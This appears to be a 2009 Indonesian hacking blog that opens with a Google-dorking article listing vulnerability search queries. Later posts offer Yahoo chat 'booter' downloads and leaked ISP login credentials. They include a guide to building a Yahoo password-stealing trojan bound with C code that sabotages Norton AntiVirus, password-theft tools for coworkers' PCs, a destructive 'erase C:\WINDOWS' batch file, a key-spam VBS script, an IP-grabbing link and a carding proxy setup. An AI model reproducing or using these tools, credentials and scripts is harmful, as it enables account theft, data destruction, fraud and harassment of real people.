Wednesday, August 19, 2009

Ragam Hacking Menggunakan Google

Ragam Hacking Menggunakan Google
Artikel ini terinspirasi dari situs http://johnny.ihackstuff.com tentang cara mendayagunakan Google dalam mencari celah keamanan website.
Jika Google menemukan alur data yang dapat mengekspos informasi sensitif mengenai organisasi anda, Google tidak akan ragu-ragu mengindeksnya. Mesin pencari ini tidak membedakan data yang diindeknya. Apa yang sebaiknya anda lakukan jika rahasia anda bocor ke publik? Anda dapat menggunakan Google untuk keuntungan anda melalui beberapa query pencarian yang spesifik. Inspirasi contoh tersebut dapat dilihat pada artikel dari Johnny Long. Dalam artikel ini Nitesh Dhanjani (konsultan keamanan IT) ini juga akan menunjukkan kepada anda bagaimana cara menggunakan Google API untuk otomasi proses pencarian Google terhadap berbagai celah keamanan.
Default Resource
Web server seringkali diinstall sebagai halaman web. Default halaman web ini tidak menunjukkan suatu celah keamanan, tapi mereka bisa mengidentifikasi sebuah konfigurasi default web server. Para attacker mengetahui bahwa halaman default seringkali menunjukkan suatu kelemahan web server.: Jika seorang administrator tidak berusaha menghapus default halaman "welcome" tersebut, sangat dimungkinkan bahwa dia tidak memblokir service "unused" atau menambahkan patch apapun. Query Google berikut ini berguna dalam mencari instalasi default Apache.
intitle:"Test Page for Apache"
Directory Listing
Web server seringkali menyediakan daftar direktori saat sebuah file default seperti index.html tidak ada dalam direktori tersebut. Terkadang, mereka menyimpan informasi sensitif dalam direktori, seperti query sederhana berikut ini:
intitle:"Index of" admin
Query diatas akan menghasilkan URL yang berisi directory listing dari /admin. Kebanyakan, para administrator membuat direktori yang bernama admin untuk menyimpan informasi sensitif. Berikut ini query yang berguna dalam mencari directory listing:
intitle:"Index of" .htpasswd
intitle:"Index of" stats.html
intitle:"Index of" backup
intitle:"Index of" etc
intitle:"Index of" finance.xls
Error Messages
Error Message dari web server dan aplikasinya dapat memberikan rincian lebih jauh. Perhatikan query Google berikut ini yang menunjukkan sebuah MySQL error. argumen yang diberikan bukanlah sebuah hasil resource MySQL yang valid. Query lainnya juga dapat membongkar informasi yang menarik diantaranya:
"A syntax error has occurred" filetype:ihtml
"ORA-00921: unexpected end of SQL command"
Remote ServicesBesar kemungkinan untuk menemukan VNC dan Terminal Service Server melalui query berikut ini. Kebanyakan administrator mengira user eksternal tidak akan mampu menemukan URL tersebut untuk mengakses informasi perihal remote service.
"VNC Desktop" inurl:5800
intitle:"Terminal Services Web Connection"
Google dapat juga mencari aplikasi administratif yang memungkinkan user untuk mengkonfigurasi system secara remote. Contohnya, berikut ini cara menempatkan instalasi phpMyAdmin:
"phpMyAdmin" "running on" inurl:"main.php"
Vulnerability Report
Nessus Framework bekerja dengan baik untuk mengidentifikasi celah keamanan suatu jaringan. Tool ini dapat membuat suatu laporan HTML mengenai celah keamanan tersebut. Seringkali, laporan langsung ada dalam direktori web root, menyebabkan server melayani semua user eksternal. Sebuah laporan Nessus bisa jadi berisi rincian celah keamanan yang ada dalam jaringan organisasinya. Berikut ini query yang digunakan Google untuk menemukan laporan berupa:
"This file was generated by Nessus" "Host Vulnerability Summary Report"
google_vulns.php
Contoh query yang disajikan dalam bagian sebelumnya hanya sebagian kecil dari query yang diketahui yang dapat menemukan celah keamanan menggunakan mesin pencari Google. Script google_vulns.php yang disajikan pada bagian ini menggunakan Google API untuk mencari query yang mirip dengan yang ada diatas. (Lihat source code Google Hack #55 untuk contoh sederhana tentang teknik query dengan Google API menggunakan PHP). Membaca sebuah file teks, signatures.txt, yang berisikan query Google dan keterangannya. Script tersebut berguna untuk mendapatkan sebuah domain name sebagai sebuah parameter untuk memaksa pencarian dalam suatu organisasi domain.
File signatures.txt berisi sebuah daftar query yang dipilih, mirip dengan yang ada pada bagian sebelumnya. Setelah setiap baris yang berisi query tertentu yang ada, terdapat suatu baris yang berisi penjelasan query tersebut. Script tersebut mengiterasi melalui file signatures.txt, dan pada setiap query, pencarian Google yang dihasilkan menggunakan Google API. Script tersebut menambahkan site: domain pada setiap query. Hal ini memungkinkan script tersebut ke target domain tertentu yang diberikan, sebuah parameter yang diberikan untuk script tersebut. Jika Google mengembalikan hasil yang valid, script tersebut menampilkan URL yang dapat digunakan, sepanjang dengan keterangan dari query tersebut.
Cara menjalankan script ini:
• Kunjungi Google Web APi dan mendaftar untuk mendapatkan sebuah account. Mereka akan meng-email anda sebuah license key.
• Download script google_vulns.php
• Edit script tersebut dan ubah nilai variabel $key untuk menrefrleksikan Google license key anda.
• Download signatures.txt dan tempatkan dalam direktori yang sama dengan google_vulns.php
• Download GoogleSearch.wsdl dan tempatkan dalam direktori yang sama dengan google_vulns.php.
• Download nusoap.php dari NuSOAP
Sekarang jalankan google_vulns.php dari baris perintah:
[bash]$ php ./google_vulns nama_target.com
Anda boleh juga menjalankan google_vulns.php dengan tanpa restriktif domain name, seperti .edu
[bash]$ php ./google_vulns .edu
************************************************
Search string: site:.edu intitle:"Index of" service.pwd
URL: http://[removed for this article]/
Directory listing contains service.pwd file(s)
************************************************
Search string: site:.edu intitle:"Index of" admin
URL: http://[nama_target]/admin/
Directory listing yang berisi file atau direktori administratif
************************************************
************************************************
Search string: site:.edu intitle:"Index of" .htpasswd
URL: http://[nama_target]/
Directory listing yang berisi file .htpasswd
************************************************
************************************************
Search string: site:.edu intitle:"Index of" stats.html
URL: http://[nama_target]/
Directory listing yang berisi stats.html yang bisa jadi
berisikan statistik webserver yang bermanfaat
************************************************
************************************************
Search string: site:.edu intitle:"Index of" .bash_history
URL: http://[nama_target]/
Directory listing yang berisi informasi bash history
************************************************
...
...
...
Script google_vulns.php hanya merupakan sebuah implementasi proof-of-concept. Bukan multi-thread, dan menurut kebijakan Google API dibatasi hanya mengembalikan 10 hasil per query. Untuk menampilkan pencarian yang lebih mendalam, gunakan sebuah tool pengganti seperti SiteDigger
Sebagaimana yang anda lihat dari output tersebut, sangat mudah untuk menggunakan Google dalam menemukan celah keamanannya. Karena script tersebut menggunakan Google untuk mencari celah keamanan, Target yang discan tidak akan mengetahui scan tersebut sampai seseorang mengguakan sebuah URL yang dihasilkan. Hal ini menjadikan jenis scanning ini benar-benar stealth.
Security Links
Script google_vulns.php mengekspos celah keamanan yang ada, pada kebanyakan kasus, hasil dari pengabaian dan kecerobohan merupakan praktek dasar terbaik. Beberapa contoh query yang diberikan dalam bagian ini berorientasi web server yang lemah. website Apache berisikan link untuk sejumlah resource yang dapat membantu administrator melindung webserver mereka, termasuk tip keamanan Apache httpd tutorial Apache httpd. Dengan catatan, administrator seharusnya secara rutin mengaudit direktori yang melayani sebagai web root untuk menjamin ada tidaknya content yang sensitif.
Aplikasi web serharusnya juga dibawah perlindungan untuk tidak menyediakan informasi sensitif kepada user. Kebanyakan celah keamanan aplikasi web terjadi akibat praktek coding yang tidak aman. Berikut beberapa resource yang dpat emembantu developer memabahami cara mengamankan aplikasi mereka.
• "PHP Security" (Part 1, Part 2, and Part 3).
• "Secure Programming for Linux and Unix HOWTO"
• "Perl Security"
• "How to Remove Meta-characters From User-Supplied Data in CGI Scripts"
• "Building Secure ASP.NET Applications: Authentication, Authorization, and secure communication
Remote service, seperti VNC dan Terminal Service, seharusnya tidak dapat diakses secara langsung dari Internet. Memerlukan remote user untuk otentikasi ke VPN Gateway yang menggunakan strong encryption untuk mengakses remote service.
Kesimpulan
Saat ini terdapat resource keamanan online yang gratis, tidak ada alasan yang dapat dimaafkan untuk tidak mengamankankan host yang kritis guna mencegah tereksposnya data yang sensitif. Meski material yang disajikan pada artikel ini tidak menggambarkan semua kemungkinan celah keamanan, saya harap hal ini berguna dikalangan para administrator dan end user.

Sekian.

Tuesday, August 18, 2009

YAHOO BOOTERS, sedia payung sebelum hujan.....

akhir2 ni dah mulai rame lge neh booters brkeliaran di tiap2 chat room,,
ne mah cma buat jga2 doank kale z id kita di room da yg ngisengin Worried.gif
dasenk punya sedikit koleksi buat perlengkapan masuk room,,tp jgn brutal make nya y Peace.gif

CODE
http://www.ziddu.com/downloadlink/4139419/YERROREXPLOITVERSION.rar

http://www.ziddu.com/downloadlink/4139397/YDestroyer.zip

http://www.ziddu.com/downloadlink/4139340/The_Changcuters.zip

[http://www.ziddu.com/downloadlink/4139330/Revoxlu3sFFSExploiter.zip

http://www.ziddu.com/downloadlink/4139319/R.I.P.Y-V3.zip

http://www.ziddu.com/downloadlink/4139210/I-Exploit.zip

http://www.ziddu.com/downloadlink/4139145/GameOverv2.zip

http://www.ziddu.com/downloadlink/4139003/fighterroombooter.rar

http://www.ziddu.com/downloadlink/4138977/Ex_Silent_Dc_Version_9.zip

http://www.ziddu.com/downloadlink/4138837/1_DC_Error.zip

http://www.ziddu.com/downloadlink/4138838/1BotCryptoz.zip

http://www.ziddu.com/downloadlink/4138880/BlinkBoot.zip

http://www.ziddu.com/downloadlink/4138881/Dragonz-WorldYZDC.zip

http://www.ziddu.com/downloadlink/4138882/Erotic-By-D-Indri.rar


pake seperlunya z y ImNotWorthy.gif ImNotWorthy.gif

domain com, net, org, dll gratis, DOMAIN TOP LEVEL GRATISs....

Trik: Cara Mendapatkan Domain .com/.net/.org/.info/.cn Gratis Legal

Juni 30, 2009

Domain berbayar seperti .com, .net, .org, .info, .cn, .biz itu biasanya dijual sekitar 70-150rb rupiah. Karena domain2 tersebut memang membuat situs kita lebih profesional dan mudah diingat. Bayangkan jika nama situs kita nafasku.blogspot.com, dengan nafasku.com lebih mudah diingat mana? Bagi anda yg belum mempunyai situs atau blog pribadi, anda bisa membuat gratis dengan .blogspot.com. Namun jika ada .com yg gratisan mengapa harus membayar. Dalam postingan ini saya akan menjelaskan cara mendapatkannya gratis namun legal bukan palsu. Ada salah satu situs yg secara cuma cuma memberikan domain internasional gratis ini. Nanti akan saya beritahukan di akhir postingan. Ini saya kasih tahu dulu seputar domain. Selain domain .com, ada juga yg gratisan lainnya seperti .co.cc. Domain ini memang singkat, tanpa iklan dan bisa atur DNSnya. ADa juga wordpress.com. Ini adalah layanan blog gratisan dari wordpress yg mempunyai banyak kekurangan. Ciri-ciri domain berbayar adalah mempunyai satu level saja. Seperti .com, .net dll. Bukan seperti co.cc atau blogspot.com. Domain .com bisa anda dapatkan gratis di…

Caranya mendapatkan domain international gratis:

1. Pergi ke situs ini :

CODE
http://www.freedomainsbox.com


2. Lalu daftarkan diri anda disana.

3. Email konfirmasi akan segera terkirim ke email anda.

4. KLik link aktivasi di email

5. login

6. KLik Refer Other People di member panel atau URLnya



7. Sebarkan URL Dalam kasus ini anda akan diberi alamat URL sendiri.

8. Cari sebanyak 7 orang untuk menjadi refferal anda. Jika mereka mendaftar melalui refferal anda, akan akan mendapatkan 1 point tiap orang yg bergabung.

9. JIka sudah terkumpul 7 point, klik “REQUEST free domain name”. Pilih domain yg kamu suka. Saya sarankan .com atau .net jika ingin membuat blog pribadi.

10. Bila ada kesulitan, YM saya kakashi_aditya

Enak banget kan..hanya merefrensi ke 7 orang kita dapat domain international gratis. Gratis lagi! Oh iya, buat kalian yg membaca postingan ini, saya harap daftarnya lewat refferal saya di

Mohon seikhlasnya. Sayang jika dikosongi. Jika saya dapat .com lagy, saya akan buat forum nafasku. oke broo..

Udah jelas semua kan? Selamat berburu domain!

Jebol pasword, jebol pasword admin untuk internet

gw punya beberapa id n pass speedy brow,,mungkiin bisa berguna..
silahkan di coba,,mudah2n msih bisa,,hehehe,,

oya,,lain x klo bertanya di kasi tag [ASK] or [REQ] di depan judul y brow,,agar temen2 gak terkecoh dengan judulnya,,okay ..Peace.gif

nih daftar nya.. :

IP : 125.162.144.4
login modem :admin : arDhi^_
username : 172417215434@telkom.net
pass : telkom135

IP : 125.162.144.37
login modem :admin : arDhi^_
username : 172421215601@telkom.net
pass : telkom135

IP : 125.162.144.91
login modem :admin : arDhi^_
username : 172426215741@telkom.net
pass : diehard

IP : 125.162.144.67
login modem :admin : arDhi^_
username : 172401215887@telkom.net
pass : telkom135


nb: smuanya paket warnet n ofiice, bagi user Home bisa pakai username itu klo buat dwnload

HACKING TELKOMSEL FLASH, yang pengen internetan gratis....

Syaratnya standard aja: nerd.png
Ini khusus untuk yg memakai sim card telkomsel (gw pake simpati,kalo As,halo gk tau,coba aja)
sim card dan Hp nya harus aktif koneksinya (3G nya)..
Lo harus punya Hp nokia yg udah mendukung 3G dan lo install PC suite nya...

CARANYA :
Pertama lo harus download dan install ketiga app dibawah ini...
Your freedom :
http://www.sendspace.com/file/g7utin

OpenVpn GUI :
http://www.sendspace.com/file/v37s6k

Cc cleaner :
http://www.sendspace.com/file/drx9ux

Setelah di install semua...

Buka app OpenVpn Gui yg telah di install...

Kemudian buka app your freedom setting(configuration) :
server c0necti0n.
-addres = 87.98.243.21
-[port = 53
-conection m0de = UDP

server connectinnya pilih(ceklis) yg :
- automatically swicth server
- reconect after server shutd0wn
- enable encryption
- enable re-keying

baru yg disebelahnya...
-minimum buffer size = 1500
-RTT ... Read Moremeasurement = 300000
-keepalive internal = 25000
-initial post size = 25000000
-minimum post size = 5000
-FTP mode = both,,

Setelah itu pindah ke ports
ceklis..
- SOCKS 4/5
- Web Proxy
- Open vpn

kemudian masuk ke account information..
-username = qqqq
-pasw0rd = 123456

kemudian save dan close...

setelah itu setting mozilla atau internet explore yg dipakai untuk browsing....
untuk mozzila : klik 'tools' kemudian pilih 'option'..
kemudian klik 'advance' pilih 'network' kemudian klik 'setting' connection
kemudian klik 'manual proxy configuration' OK.


cara connectnya:
buka :
- Openvpn gui
- aktifin nokia pc suite
- connect to internet
- c0nfigurasi/setting
- ganti yg pilihan ke dua..
- isi acces pointnya = flash
- conetct..
kemudian buka y0ur freed0m, setelah itu tunggu sampe pintunya terbuka semua (terlihat mataharinya..)

yaudah 0nline...


selamat mencoba,bagi yg udah berhasil gw tunggu comentnya..
speak_cool.gif

Aplikasi Buat Intip Foto Facebook, bisa liat foto target walaupun belum di Add

Buat yg suka intip foto FB, skrg kita bisa liat foto target walaupun belum jd temen (blm di add).
caranya sangat mudah tinggal masukin NAMA, ID or PROFIL URL target yang mo kita intip

CODE
http://apps.facebook.com/josh_owns/

screenshot :
Reduced: 73% of original size [ 692 x 600 ] - Click to view full image


ato search "photo stalker" trus pasang aplikasi ini di akun kamu.
Reduced: 65% of original size [ 784 x 596 ] - Click to view full image

Tutorial Cara Penggunaan Aplikasi Yahoo Boot

sebelum langsung ke tutor nya,,ada baiknya kita pahami dulu apa pengertian dari yahoo boot

sebelum menggunakan progy yahoo booter kita harus membuat id yahoo sebanyak2nya. istilah id booter ini adalah sebagai peluru dan program booter adalah senapannya, tapi untuk pemula cukup 50 id aja dulu untuk percobaan.. dan jangan lupa! untuk memudahkan mengingat password. lebih baik password di samakan antara id satu dengan yang lainya..

cara kerja mesin boot adalah dng meng' on-line kan bberapa ID (yg biasa kita sebut peluru) secara bersamaan dan mengirimkan pesan kepada Victim/korban secara bersamaan pula, jumlah peluru/ID boot yg di tembakkan juga mempengaruhi, biasanya para booter menggunakan 50-100 lebih untuk menendang musuhnya dari room, tapi ingat koneksi dan kualitas komputer sangat berpengaruh besar di sini. bagi yg memiliki koneksi lemah ada beberapa mesin yg hanya membutuhkan 1 ID untuk menjatuhkan lawan, tp hanya bisa digunakan jika lawannya menggunakan YM official,chat client

kemudian setelah id terbuat simpan id ke dalam notepad. dengan format separator yang telah di tentukan oleh program booter itu. dan kebanyak program booter mengunakan format > idboot:pass

sekarang saatnya menggunakan program booter >> buka program booter!!

1. klik load
2. pilih notepad dimana kita tadi menyimpan id boot
3. klik open
4. pilih berapa id boot yang akan digunakan untuk nyerang korban
5. kemudian klik login
6. tulis id korban di kolom victim yang akan kita boot
7. klik salah satu option booter yang di sediakan.



Reduced: 82% of original size [ 624 x 435 ] - Click to view full image


mungkin segini dulu,,barangkali da yang mu nambahin Hug.gif

trojan nehh!!!, untuk mendapatkan id ma pass ym

kita main-main dengan trojan hhyuuukkkk ;) Trojannya nanti
kita kasih tugas untuk mendapatkan Yahoo account berupa username + passwordnya.
Trojan ini memang diciptakan dan selalu dikembangkan sesuai dengan perkembangan
versi Yahoo Messenger. Trojannya kita buat dengan trojan generator kemudian
kita binding (editor: binding <-> mengikat) dengan aplikasi pem-binding. Nanti
hasil dari pembindingannya kita sebar di beberapa tempat, bisa melalui email,
kirim langsung melalui YM atau dengan cara membuang (?) CD ditempat tertentu.

---// Bagaimana caranya?

------[ Persiapan

- Magic-PS Trojan Generator.
Bisa Anda download disini : http://magic.shabgard.org/Magic-PS-15se++.zip
- File Binder. Anda bisa memanfaatkan file binder apapun.
- C Compiler

------[Target Trojan

- User yang mempergunakan windows (-- yg pake linux aman bro ;)
- User yang masih bisa kena 'social engineering' (bro.. terserah gimana
caranya deh.. biar tuh user bisa mati'in Antivirusnya....)
Kalo dia ga mau mati'in ya udah. Nanti kita matikan secara paksa
dengan coding tertentu (editor: jangan maen clurit ya? ;) ).

------[Pembuatan Trojan

- Matikan semua Antivirus yang berada di komputer Anda
(--hhikkzzz.. kalo ga dimatikan bakalan ga' bisa bikin trojan).
- Buatlah sebuah folder untuk menempatkan hasil trojan.
- Copy Magic-PS-15se++ ke dalam folder yang Anda buat, dan eksekusilah
trojan generator tersebut.

Nanti tampilannya seperti ini :


+--------------------------------------------------+
| Magic-PS-15se |
+--------------------------------------------------+
| Victim |
| |
| [v] Send Y! Mess Pass [ ] Send OS Name |
| [ ] Send IP [v] Auto Startup |
| [ ] Send Computer Name [ ] Send win UserName |
| [ ] Disable taslmgr XP-2k [ ] Disable RegEdit |
| [v] Disbale Y! save pass [ ] Disable MsConfig |
| [V] Delete Mess Archive [ ] Melt After Install |
| [ ] Encode Pass +---------------------+ |
| FileName After Install | regsvr.exe | |
| +---------------------+ |
| [ ] Fake Error Message |
| +----------------------+ |
| Caption | | +-------+ |
| +----------------------+ | | |
| +----------------------+ | Test | |
| Message | | +-------+ |
| +----------------------+ |
| Your Yahoo! ID that logged pass send to it |
| +----------------------+ |
| Y! ID | | |
| +----------------------+ |
| Just type ID don't use @yahoo.com Ex: john_26 |
| [ ] Binder +------------+ +--------+ |
| [..] Extract to |TempDir | Run |Normal | |
| +------------+ +--------+ |
| Choose icon (only for .exe and .scr) |
| ( ) No icon ( ) JPG icon ( ) Setup icon |
| ( ) Zip icon ( ) RAR icon ( ) Love icon |
| ( ) Flash icon1 ( ) Flash icon2 ( ) Flash icon3 |
| ( ) Paint icon ( ) PDF icon ( ) Transparent |
| MPS Creator |
| +---------------+ |
| FileName |Sender.exe | |
| +---------------+ |
+--------------------------------------------------+
| Create MPS | DeCoder | About | Exit |
+--------------------------------------------------+

Keterangan Trojan :
[01] Victim, pada bagian ini Anda bisa memberikan tugas tambahan pada
trojan yang Anda inginkan, misalkan saja mengambil IP Address si
target.
[02] File After Install, jika trojan ini dieksekusi maka trojan tersebut
akan melakukan penyamaran diri berupa file 'regsvr.exe'. Anda bisa
memilih file penyamaran lainnya.
[03] Y! ID, isi bagian ini dengan account Yahoo milik Anda. Ingat! Account
ID milik Anda juga harus Yahoo! dan proses pengisian pada bagian tersebut
tidak disertai "@yahoo.com". Jadi cukup mengisi ID saja. Trojan akan
memberikan account + password si target ke email tersebut!
[04] Choose icon, silahkan Anda memilih icon penyamaran trojan.
[05] FileName, ini merupakan file trojan hasil generator. File inilah yang
nantinya Anda kirim ke target yang menjadi sasaran kita ;)
[06] Create MPS merupakan tombol yang men-generate trojan.


------[ Penyiapan Routin Pembunuh NAV :

Bye bye NAV. Nah, ini adalah routine yang bisa Anda gunakan untuk
membunuh NAV secara paksa. Routine ini dibuat oleh teman saya : Magic_h2001
(Hai 'Magic_h2001'... thx for ur code).

//--- code ----//
/*
Kill Norton AntiVirus (All versions). Local Exploit.
Norton AV can not protect this file : VIRSCAN1.DAT
and can not Detect any virus after modify this file !
(editor: jadi ceritanye nih, file .DAT nya dioverwrite ama data sampah)
*/

#include
int main()
{
HWND Lpbuff;
HKEY handle;
DWORD temp,size;
char buff[255],fName[255],dirName[255];
temp=RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\micr*soft\\Windows\\CurrentVersion\\",0,KEY_READ,&handle);
if(temp!=ERROR_SUCCESS)
return 1;
size=sizeof(buff);
temp=RegQueryValueEx(handle,"CommonFilesDir",0,&temp,buff,&size);
if(temp!=ERROR_SUCCESS)
return 1;
RegCloseKey(handle);
strcat(buff,"\\Symantec Shared\\virusdefs\\");
strcpy(fName,buff);
strcat(buff,"definfo.dat");
SetFileAttributes(buff,FILE_ATTRIBUTE_ARCHIVE);
GetPrivateProfileString("DefDates","CurDefs","",dirName,sizeof(dirName),buff);
if(!strcmp(dirName,""))
return 1;
strcat(fName,dirName);
strcat(fName,"\\VIRSCAN1.DAT");
SetFileAttributes(fName,FILE_ATTRIBUTE_ARCHIVE);
handle=CreateFile(fName,GENERIC_WRITE,FILE_SHARE_READ,NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(handle==INVALID_HANDLE_VALUE)
return 1;
size=GetFileSize(handle,&temp)-32;
Lpbuff=GlobalAlloc(GMEM_FIXED,size);
if(!Lpbuff)
{
CloseHandle(handle);
return 1;
}
FillMemory(Lpbuff,size,0x90);
SetFilePointer(handle,32,0,FILE_BEGIN);
WriteFile(handle,Lpbuff,size,&temp,NULL);
CloseHandle(handle);
return 0;
}


* Silahkan Anda Compile source code tersebut menjadi sebuah file eksekusi.
//--- code ----//


------[ Proses Penyerangan
-
Anggap saja dari beberapa proses tersebut diatas kita sudah mememiliki
2 (dua) file yaitu :
- sender.exe ----> trojan
- killanvir.exe ----> pembunuh NAV.

Kini saatnya Anda melakukan proses Binder terhadap keduanya. Yang
terpenting pada proses Binder file yang bekerja pertama adalah killanvir.exe.
Ini agar sebelum trojannya jalan, NAV sudah terbunuh lebih dulu. Setelah
proses binding selesai kini saatnya Anda menyebarkan file tersebut ke target
yang dituju. Terserah, dengan metode apapun sekali lagi, jangan
pakai clurit yah BigGrin.gif BigGrin.gif

Hacker yang baik, buat belajar aj,,,

This summary is not available. Please click here to view the post.

PASANG PROXY Di MOZILLA, CARDING TIME BOYZ....

Senjata para carder adalah IP PROXY. Dan hal ini adalah sangat penting untuk menyembunyikan diri identitas browsernya ketika kita melakukan aktivitas carding.



Reduced: 50% of original size [ 1024 x 768 ] - Click to view full image



Reduced: 50% of original size [ 1024 x 768 ] - Click to view full image



Reduced: 50% of original size [ 1024 x 768 ] - Click to view full image



Reduced: 50% of original size [ 1024 x 768 ] - Click to view full image



Reduced: 50% of original size [ 1024 x 768 ] - Click to view full image



Reduced: 50% of original size [ 1024 x 768 ] - Click to view full image



Reduced: 50% of original size [ 1024 x 768 ] - Click to view full image



Reduced: 50% of original size [ 1024 x 768 ] - Click to view full image



Reduced: 50% of original size [ 1024 x 768 ] - Click to view full image

Tool kecil pembobol password Email, FS dsb, klo repost hapus aj



Lagi-lagi ane sharing buat bro n sis...
Ade dua tool kecil yang gedenye cuma 40KB tapi khasiatnya muantaaaaaaab...dan tanpa perlu di instal, langsung di jalanin..
Ane contohin, misalnye ente pengen tau password email, fs dsb dari temen kerja ente yang ada di samping ente.
Caranye, ente tunggu die cabut dari kursinye. Pas die ninggalin tuh kursinye, ente jalanin aje tuh tool via Flashdisk atau floppy.
Tapi sebelumnye ente disable dulu anti virus di tuh kompi, soalnye kalo ga bakal ke ditek jadi trojan (yang jelas ni tool bukan virus).
Abis ntu.....dicoba jalanin deh.
Jreng----jreng!!!!....semua password yang beberapa menit lalu pernah dimasukin ame temen ente, bakal kebuka tanpa kecuali. Hebat kan?

Jadi intinye ni tool bakal nyedot semua password yang tersimpan di cookies dari kompi yang abis di pake wat ngenet. Gityu bro.

Untuk calon victim nyang pake Firefox, download
CODE
http://www.ziddu.com/download/2960500/passwordfox.zip.html


Untuk calon victim nyang pake IE, downloadnye
CODE
http://www.ziddu.com/download/2960521/IE_PasswordViewer.zip.html


buruan mumpung masih hidup link nya...:pace:

CODE
moderate message : gunain tag [code] pada link.!

cara membobol proxy jaryngan kantor, [Ask] cara membobol proxy jaryngan kantor

ga usah bobol2an dulu, coba ini bro..
CODE
http://www.vtunnel.com

terus jangan ada tanda contengan disini No cookies Remove Scripts Hide referrers

moga bisa membantu..

maaf, tapi jangan lupa bro mungkin kalo waktunya kerja sebaiknya jangan FBan dulu Peace.gif

Buat virus simpel..(part 1), sangat mudah tapi sangat berbahaya!?

PERINGATAN!!

SAYA NGGAK BERTANGGUNG JAWAB KALO KOMPUTER KAMU/ORANG LAEN HANCUR!!


okeiii...lets start on beibeh!? happy.gif

yg kamu butuhkan cuma notepad!!

Buka Notepad en ketik reg(spasi)fadil kirim ke 5778721..
eh salah!? chaong.gif
mestix ketik "erase C:\WINDOWS" buat windows ato "erase C:\LINUX" kalo pake linux. (ga pake tanda kutip yeh..)
terus save as dengan nama findoutaname.cmd
JANGAN BUKA file tersebut ato kamu bakalan kehilangan WINDOWS kamu..
Karena file itu adalah virus. Sekarang kirim file tersebut ke komputer lawan. Saat dia membukanya, WINDOWS/LINUX dia bakalan ancur!!. En dia mau-nggak-mau mesti meng-install ulang WINDOWS/LINUX milikx...

HAHAHAHAHAHA.... Devil.gif

[ask] hack ym, gimana cara liat teman lg ol

bisa kok...tapi lu harus tau id tuh pengguna YM nya, kalo lu udah tau id nya, lu cek aja ke sini

gampang kan... speak_cool.gif speak_cool.gif guitar.gif Tounge.gif

Buat virus simpel..(part 2), sangat mudah tapi sangat menjengkelkan!?

PERINGATAN!!

SIAPA SAJA YG MEMBUKA FILE INI BAKALAN WAFAT KARENA MENCET2 TOMBOL ENTER


hehehehe.... Laughing.gif
ane udah kena getahnya nigh waktu ada seekor temen gw yg ngirim file ini...
virus ini bisa buat kamu mencet tombol ENTER sampe MAMPUS... Devil.gif
yg kamu butuhkan cuma NOTEPAD!!

okeiii...lets start on beibeh!? happy.gif
copy paste text dibawah ke notepad terus save as dengan nama "anything.vbs" (tanpa tanda kutang).
udah!? itu aja, gampang khan!? chaong.gif

Set wshShell = wscript.CreateObjec t("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Temukan IP lawan.., cuma pake link en e-mail

bebepara program hacking biasax membutuhkan IP addres untuk hacking (ya iyalah..masa buat masak!? chaong.gif)

maka dari itu saya punya cara buat dapetin IP lawan dengan sebuah link..

caranya : 1.kirim link dibawah sebagai sortcut malalui e-mail, ato cukup kasih tau aja supaya dia datang ke link tsb..

2.setelah dia membuka link tersebut, maka info yg ada pada link tsb ke e-mail yg kamu masukin...

3.kemudian buka e-mail kam dan VOILA!? kamu dapet 1 message inbox... joged.gif

http://rpgcrime.com/send.swf?msg=themainte...here:xxxxxxxxxx (masukkan e-mail kamu)

contoh ne : http://rpgcrime.com/send.swf?msg=themainte...mpret@gmail.com